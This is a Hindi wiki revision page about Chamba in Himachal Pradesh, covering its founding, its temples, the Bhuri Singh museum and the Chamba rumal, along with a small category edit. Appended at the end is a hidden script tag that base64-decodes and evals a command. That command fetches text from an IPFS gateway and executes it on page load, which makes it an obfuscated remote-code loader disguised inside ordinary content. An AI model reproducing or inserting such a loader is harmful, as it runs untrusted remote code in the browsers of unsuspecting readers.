"चंबा" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
छो (Adding category Category:हिमाचल प्रदेश के ऐतिहासिक नगर (को हटा दिया गया हैं।))
छो (Adding category Category:पर्यटन कोश (को हटा दिया गया हैं।))
पंक्ति 15: पंक्ति 15:
 
[[Category:हिमाचल प्रदेश]]
 
[[Category:हिमाचल प्रदेश]]
 
[[Category:हिमाचल प्रदेश के ऐतिहासिक नगर]]
 
[[Category:हिमाचल प्रदेश के ऐतिहासिक नगर]]
 +
[[Category:पर्यटन कोश]]

07:26, 13 नवम्बर 2010 का अवतरण

वर्मन वंश की राजकुमारी चंपा के नाम पर हिमाचल प्रदेश की पहाड़ियों में रावी नदी के किनारे बसे चंबा शहर को मंदिरों की नगरी, कलानगरी और मनोरम पर्यटन स्थल कहलाने का गौरव प्राप्त है। चंबा के संस्थापक साहिल वर्मा ने 820 ई. में इस शहर का नामकरण अपनी पुत्री चंपा के नाम पर किया। साहिल वर्मा द्वारा निर्मित चमेसनी देवी का मन्दिर ऐतिहासिक चौगान के पास आज भी विद्यमान है। वास्तुकला की दृष्टि से यह मन्दिर अद्वितीय है। लक्ष्मीनारायण मन्दिर समूह तो चंबा का सर्वप्रसिद्ध देवस्थल है। इस मन्दिर समूह में महाकाली, हनुमान, नंदीगण के मंदिरों के अलावा विष्णु एवं शिव के तीन-तीन मंदिर हैं। चंबा की प्राचीन लक्ष्मीनारायण की बैकुंठ मूर्ति में कश्मीरी तथा गुप्तकालीन तक्षणकला का अनूठा संगम है।

चंबा में भूरीसिंह नाम का एक संग्रहालय है, जहाँ चंबा घाटी की प्राचीन कला के विभिन्न पक्ष अपनी मूक, किंतु जीवंत कहानी को कहते प्रतीत होते हैं। यह संग्रहालय भारत के पाँच प्रमुख प्राचीन संग्रहालयों मे से एक है। इस संग्रहालय का निर्माण 1908 ई. में चंबा नरेश भूरीसिंह ने डच विद्वान डॉ. फोगल की प्रेरणा से किया था। इस संग्रहालय में पाँच हजार से अधिक दुर्लभ कलाकृतियाँ हैं। विश्व प्रसिद्ध चंबा रुमाल भी यहाँ की विरासत है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>